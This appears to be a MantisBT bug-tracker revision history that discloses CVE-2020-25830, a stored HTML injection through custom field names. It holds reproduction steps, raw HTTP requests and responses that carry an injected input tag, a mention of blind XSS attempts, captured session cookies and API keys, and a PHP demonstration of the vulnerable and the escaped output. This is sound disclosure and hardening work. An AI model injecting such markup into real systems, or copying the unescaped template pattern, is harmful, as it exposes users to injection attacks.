View Revisions: Issue #27304

Summary 0027304: CVE-2020-25830: HTML Injection in bug_actiongroup_page.php
Revision 2020-09-23 12:13 by dregad
Steps To Reproduce
  • Login as admin
  • Go to manage_custom_field_page.php
  • Create a custom field with name <input type="text" value="Look I Injected this">
  • Link this new custom field to some project
  • Go to view_all_bug_page.php
  • Select one or more issues from the list
  • Pick Update <input type="text" value="Look I Injected this"> from the selection list at page bottom
  • Click OK to submit the form

bug_actiongroup_page.php opens, and you see a rendered input field with the value Look I Injected this (see attached screenshot poc.png)

Revision 2020-09-21 00:44 by d3vpoo1
Steps To Reproduce

Caution:

I have already replaced my Blind XSS payloads and double-checked this, but please double-check the response too; I don't want to cause harm. I searched for the word xss in the response and it seems no XSS payload rendered (the only payload that rendered is <input type="text" value="Look I Injected this">).

  • Login as your admin

  • Create custom field

  • Insert this payload <input type="text" value="Look I Injected this">

Request

POST /mantisbt2/manage_custom_field_create.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/manage_custom_field_page.php
SOME-HEADERS

manage_custom_field_create_token=<TOKEN>&name=%3Cinput+type%3D%22text%22+value%3D%22Look+I+Injected+this%22%3E

Response

HTTP/1.1 200 OK
Date: Mon, 21 Sep 2020 04:31:20 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 21 Sep 2020 04:31:20 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Mon, 21 Sep 2020 04:31:20 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 10077
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <title>MantisBT</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/default.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/status_config.php?cache_key=f4856b33b84f247924ce5769a9d0b2d2" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/dropzone-5.5.0.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/bootstrap-3.4.1.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/font-awesome-4.6.3.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/fonts.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/bootstrap-datetimepicker-4.17.47.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace-mantis.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace-skins.min.css" />

    <link rel="shortcut icon" href="/mantisbt2/images/favicon.ico" type="image/x-icon" />
    <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt2/browser_search_plugin.php?type=text"/>
    <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt2/browser_search_plugin.php?type=id"/>
    <script type="text/javascript" src="/mantisbt2/javascript_config.php?cache_key=f4856b33b84f247924ce5769a9d0b2d2"></script>
    <script type="text/javascript" src="/mantisbt2/javascript_translations.php?cache_key=3be95d1715b5c55a9480208daf800add"></script>
    <script type="text/javascript" src="/mantisbt2/js/jquery-2.2.4.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/dropzone-5.5.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/common.js"></script>
    <meta http-equiv="Refresh" content="1; URL=http://localhost/mantisbt2/manage_custom_field_edit_page.php?field_id=8" />
</head>
<body class="skin-3">
<style>
* { font-family: "Open Sans"; } 
h1, h2, h3, h4, h5 { font-family: "Open Sans"; } 
</style>
<div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt2/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a><a class="btn btn-primary btn-sm" href="manage_user_create_page.php"><i class="fa fa-user-plus"></i> Invite Users</a></div></li><li class="grey" id="dropdown_projects_menu">
<a data-toggle="dropdown" href="#" class="dropdown-toggle">
&#160;1&#160;
 <i class="ace-icon fa fa-angle-down bigger-110"></i>
</a>
<ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close">
<li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li>
<li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li>/mantisbt2/set_project.php?project_id=0</li>
<li class="divider"></li>
<li class="active">/mantisbt2/set_project.php?project_id=2</li>
<li>/mantisbt2/set_project.php?project_id=2;4</li>
<li>/mantisbt2/set_project.php?project_id=3</li>
<li>/mantisbt2/set_project.php?project_id=3;1</li>
</ul></div></li></ul>
</li>
<li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">administrator</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt2/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt2/issues_rss.php?username=administrator&key=nNUB0bUOFU1-De7V6n8RKAdmhJ6pi6Aa90nbcI9AxxsZbE1s_lH6wQuBjczaLZGNrGwqwTcaFunQLMtD04uK&project_id=2"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt2/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container">
<div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li>
<a href="/mantisbt2/main_page.php">
<i class="menu-icon fa fa-bullhorn"></i> 
<span class="menu-text"> Main </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt2/my_view_page.php">
<i class="menu-icon fa fa-dashboard"></i> 
<span class="menu-text"> My View </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt2/view_all_bug_page.php">
<i class="menu-icon fa fa-list-alt"></i> 
<span class="menu-text"> View Issues </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt2/bug_report_page.php">
<i class="menu-icon fa fa-edit"></i> 
<span class="menu-text"> Report Issue </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt2/changelog_page.php">
<i class="menu-icon fa fa-retweet"></i> 
<span class="menu-text"> Change Log </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt2/roadmap_page.php">
<i class="menu-icon fa fa-road"></i> 
<span class="menu-text"> Roadmap </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt2/summary_page.php">
<i class="menu-icon fa fa-bar-chart-o"></i> 
<span class="menu-text"> Summary </span>
</a>
<b class="arrow"></b>
</li>
<li class="active">
<a href="/mantisbt2/manage_overview_page.php">
<i class="menu-icon fa fa-gears"></i> 
<span class="menu-text"> Manage </span>
</a>
<b class="arrow"></b>
</li>
</ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left"
        class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content">
<div id="breadcrumbs" class="breadcrumbs noprint">
<ul class="breadcrumb">
  <li><i class="fa fa-user home-icon active"></i>  /mantisbt2/account_page.php
  <span class="label hidden-xs label-default arrowed">administrator</span></li>
</ul>
<div class="nav-recent hidden-xs">Recently Visited: /mantisbt2/view.php?id=22</div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt2/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div>
</div>
  <div class="page-content">
<div class="row">
<div class="container-fluid"><div class="col-md-12 col-xs-12"><div class="space-0"></div><div class="alert alert-success center"><p class="bold bigger-110">Operation successful.</p><br /><div class="btn-group">manage_custom_field_edit_page.php?field_id=8</div></div></div></div>
</div>
</div>
</div>
<div class="clearfix"></div>
<div class="space-20"></div>
<div class="footer noprint">
<div class="footer-inner">
<div class="footer-content">
<div class="col-md-6 col-xs-12 no-padding">
<address>
<strong>Powered by https://www.mantisbt.org</strong> <br>
<small>Copyright &copy; 2000 - 2020 MantisBT Team</small><br><small>Contact thisisfortestingresearchonly@gmail.com for assistance</small><br>
</address>
</div>
<div class="col-md-6 col-xs-12">
<div class="pull-right" id="powered-by-mantisbt-logo">
<a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt2/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a>
</div>
</div>
</div>
</div>
</div>
<a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#">
<i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i>
</a>
</div>
    <script type="text/javascript" src="/mantisbt2/js/bootstrap-3.4.1.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/moment-with-locales-2.24.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/bootstrap-datetimepicker-4.17.47.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/typeahead.jquery-1.3.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/list-1.5.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/ace.min.js"></script>
</body>
</html>
  • Link this new custom field to other issues

  • Login as developer account

  • Go to view_all_bug_page.php

  • Select anything and use the customize field

  • Submit the form

In my case, this is the request and response:

Request

POST /mantisbt2/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/view_all_bug_page.php
Cookie: MANTIS_collapse_settings=|resolved:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=2; PHPSESSID=q83o812mjs41pjfkfhr34g2613; MANTIS_secure_session=1; MANTIS_STRING_COOKIE=OncjK0J1oGgncmShWq0m-uP7sK905QTAmR1rxnh6JTuncssj_bRS2Tp2JTHyBUM5; MANTIS_BUG_LIST_COOKIE=23%2C22
Upgrade-Insecure-Requests: 1

bug_arr%5B%5D=22&action=custom_field_8

Response

HTTP/1.1 200 OK
Date: Mon, 21 Sep 2020 04:37:00 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 21 Sep 2020 04:37:01 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Mon, 21 Sep 2020 04:37:01 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 10806
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <title>MantisBT</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/default.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/status_config.php?cache_key=c9f03e237b2bbf0ff74e4de99e60aab9" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/dropzone-5.5.0.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/bootstrap-3.4.1.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/font-awesome-4.6.3.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/fonts.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/bootstrap-datetimepicker-4.17.47.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace-mantis.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace-skins.min.css" />

    <link rel="shortcut icon" href="/mantisbt2/images/favicon.ico" type="image/x-icon" />
    <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt2/browser_search_plugin.php?type=text"/>
    <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt2/browser_search_plugin.php?type=id"/>
    <script type="text/javascript" src="/mantisbt2/javascript_config.php?cache_key=c9f03e237b2bbf0ff74e4de99e60aab9"></script>
    <script type="text/javascript" src="/mantisbt2/javascript_translations.php?cache_key=3be95d1715b5c55a9480208daf800add"></script>
    <script type="text/javascript" src="/mantisbt2/js/jquery-2.2.4.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/dropzone-5.5.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/common.js"></script>
</head>
<body class="skin-3">
<style>
* { font-family: "Open Sans"; } 
h1, h2, h3, h4, h5 { font-family: "Open Sans"; } 
</style>
<div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt2/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a></div></li><li class="grey" id="dropdown_projects_menu">
<a data-toggle="dropdown" href="#" class="dropdown-toggle">
&#160;1&#160;
 <i class="ace-icon fa fa-angle-down bigger-110"></i>
</a>
<ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close">
<li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li>
<li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li>/mantisbt2/set_project.php?project_id=0</li>
<li class="divider"></li>
<li class="active">/mantisbt2/set_project.php?project_id=2</li>
<li>/mantisbt2/set_project.php?project_id=2;4</li>
<li>/mantisbt2/set_project.php?project_id=3</li>
<li>/mantisbt2/set_project.php?project_id=3;1</li>
</ul></div></li></ul>
</li>
<li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">developer</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt2/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt2/issues_rss.php?username=developer&key=D0UyVWhrNESQzO6Vfbhn4r-Nd9W69_PliszYzBiXVf874UK0ga5A9cZ0PavdL6cLjnmqSnV_ayBXeLVhmDCW&project_id=2"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt2/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container">
<div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li>
<a href="/mantisbt2/main_page.php">
<i class="menu-icon fa fa-bullhorn"></i> 
<span class="menu-text"> Main </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt2/my_view_page.php">
<i class="menu-icon fa fa-dashboard"></i> 
<span class="menu-text"> My View </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt2/view_all_bug_page.php">
<i class="menu-icon fa fa-list-alt"></i> 
<span class="menu-text"> View Issues </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt2/bug_report_page.php">
<i class="menu-icon fa fa-edit"></i> 
<span class="menu-text"> Report Issue </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt2/changelog_page.php">
<i class="menu-icon fa fa-retweet"></i> 
<span class="menu-text"> Change Log </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt2/roadmap_page.php">
<i class="menu-icon fa fa-road"></i> 
<span class="menu-text"> Roadmap </span>
</a>
<b class="arrow"></b>
</li>
</ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left"
        class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content">
<div id="breadcrumbs" class="breadcrumbs noprint">
<ul class="breadcrumb">
  <li><i class="fa fa-user home-icon active"></i>  /mantisbt2/account_page.php
  <span class="label hidden-xs label-default arrowed">developer</span></li>
</ul>
<div class="nav-recent hidden-xs">Recently Visited: /mantisbt2/view.php?id=23</div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt2/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div>
</div>
  <div class="page-content">
<div class="row">

<div class="col-md-12 col-xs-12">
<div id="action-group-div" class="form-container">
    <form method="post" action="bug_actiongroup.php">
        <input type="hidden" name="bug_actiongroup_CUSTOM_token" value="20200921U0hsx2e1DQ7yy2Y2QvtN2_JKmK_cSpZd"/>        <input type="hidden" name="action" value="CUSTOM" />
<input type="hidden" name="bug_arr[]" value="22" />
<input type="hidden" name="custom_field_id" value="8" /><div class="widget-box widget-color-blue2">
<div class="widget-header widget-header-small">
    <h4 class="widget-title lighter">
        Update <input type="text" value="Look I Injected this">  </h4>
</div>
<div class="widget-body">
    <div class="widget-main no-padding">
        <div class="table-responsive">
            <table class="table table-bordered table-condensed table-striped">
            <tbody>
                <tr>
                    <th class="category">
                        Update <input type="text" value="Look I Injected this">                  </th>
                    <td>
<input tabindex="1" type="text" id="custom_field_8" name="custom_field_8"  maxlength="255" size="80" value="" /><input type="hidden" name="custom_field_8_presence" value="1" />
                    </td>
                </tr>
        <tr class="spacer"></tr>
        <tr><th class="category" colspan="2">Selected Issues</th></tr><tr> <td><i class="fa fa-square fa-status-box status-50-fg"></i>  /mantisbt2/view.php?id=22</td> <td>1</td> </tr>
        <tr class="spacer"></tr>
            </tbody>
        </table>
        </div>
        </div>
        <div class="widget-toolbox padding-8 clearfix">
            <input type="submit" class="btn btn-primary btn-white btn-round" value="Update <input type="text" value="Look I Injected this">" />
        </div>
        </div>
        </div>
    </form>
</div>
</div>

</div>
</div>
</div>
<div class="clearfix"></div>
<div class="space-20"></div>
<div class="footer noprint">
<div class="footer-inner">
<div class="footer-content">
<div class="col-md-6 col-xs-12 no-padding">
<address>
<strong>Powered by https://www.mantisbt.org</strong> <br>
<small>Copyright &copy; 2000 - 2020 MantisBT Team</small><br><small>Contact thisisfortestingresearchonly@gmail.com for assistance</small><br>
</address>
</div>
<div class="col-md-6 col-xs-12">
<div class="pull-right" id="powered-by-mantisbt-logo">
<a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt2/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a>
</div>
</div>
</div>
</div>
</div>
<a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#">
<i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i>
</a>
</div>
    <script type="text/javascript" src="/mantisbt2/js/bootstrap-3.4.1.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/moment-with-locales-2.24.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/bootstrap-datetimepicker-4.17.47.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/typeahead.jquery-1.3.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/list-1.5.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/ace.min.js"></script>
</body>
</html>
  • Now it redirects to /bug_actiongroup_page.php and you see a rendered input field with the value Look I Injected this
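Both revisions above describe the same defect: the custom field name is stored verbatim and bug_actiongroup_page.php prints it without escaping, in element content (the h4 title and the th cell) and inside the submit button's value attribute, where the first double quote of the stored name closes the attribute early. As an added example (not code from the MantisBT project or from the report), the PHP below reproduces those two rendering contexts with the field name from the report, first concatenated verbatim, then escaped at the output boundary with htmlspecialchars(). The function names and the template fragment are assumptions made for the illustration; inside MantisBT the equivalent output helpers are string_display_line() and string_attribute() in core/string_api.php.

```php
<?php
declare(strict_types=1);

// Added illustration for CVE-2020-25830 (not MantisBT's own code). FIELD_NAME
// is the constructed sample from the report: the value submitted as "name" to
// manage_custom_field_create.php and later printed by bug_actiongroup_page.php.
const FIELD_NAME = '<input type="text" value="Look I Injected this">';

// Vulnerable pattern (hypothetical template): the stored name is concatenated
// into the page verbatim, once as element content (the <h4> title) and once
// inside a quoted attribute (the submit button's value). In the second spot the
// first '"' of the stored name closes the attribute, so the markup breaks out.
function render_unsafe(string $field_name): string
{
    $label = 'Update ' . $field_name;
    return "<h4 class=\"widget-title lighter\">$label</h4>\n"
         . "<input type=\"submit\" value=\"$label\" />\n";
}

// Escape for HTML at the output boundary. ENT_QUOTES encodes both quote
// characters, so one helper covers element content and double- or
// single-quoted attribute values alike.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: identical markup, but the untrusted name is escaped.
function render_safe(string $field_name): string
{
    $label = 'Update ' . esc($field_name);
    return "<h4 class=\"widget-title lighter\">$label</h4>\n"
         . "<input type=\"submit\" value=\"$label\" />\n";
}

// Reviewer's check: count the <input> start tags a browser would parse.
// The template itself contributes exactly one (the submit button); anything
// beyond that came from the field name.
function count_input_tags(string $html): int
{
    return preg_match_all('/<input\b/i', $html);
}

$unsafe = render_unsafe(FIELD_NAME);
$safe   = render_safe(FIELD_NAME);

echo "--- unsafe ---\n", $unsafe, "--- safe ---\n", $safe;

// Unsafe: 3 (payload in <h4>, the submit button, payload inside its value).
// Safe:   1 (the submit button only; the payload is now inert text).
printf("input tags, unsafe: %d, safe: %d\n",
    count_input_tags($unsafe), count_input_tags($safe));

if (count_input_tags($unsafe) !== 3 || count_input_tags($safe) !== 1) {
    fwrite(STDERR, "unexpected result\n");
    exit(1);
}
```

Run it with `php` from the command line. The same count check is a cheap regression test for a page like this one: render the page with a field name that contains markup and assert that the number of form controls matches what the template alone produces. Escaping belongs at the point of output rather than at the point of storage, because the stored name is also shown in other contexts (the custom field editor, the selection list on view_all_bug_page.php) that each need the escaping appropriate to where the value lands.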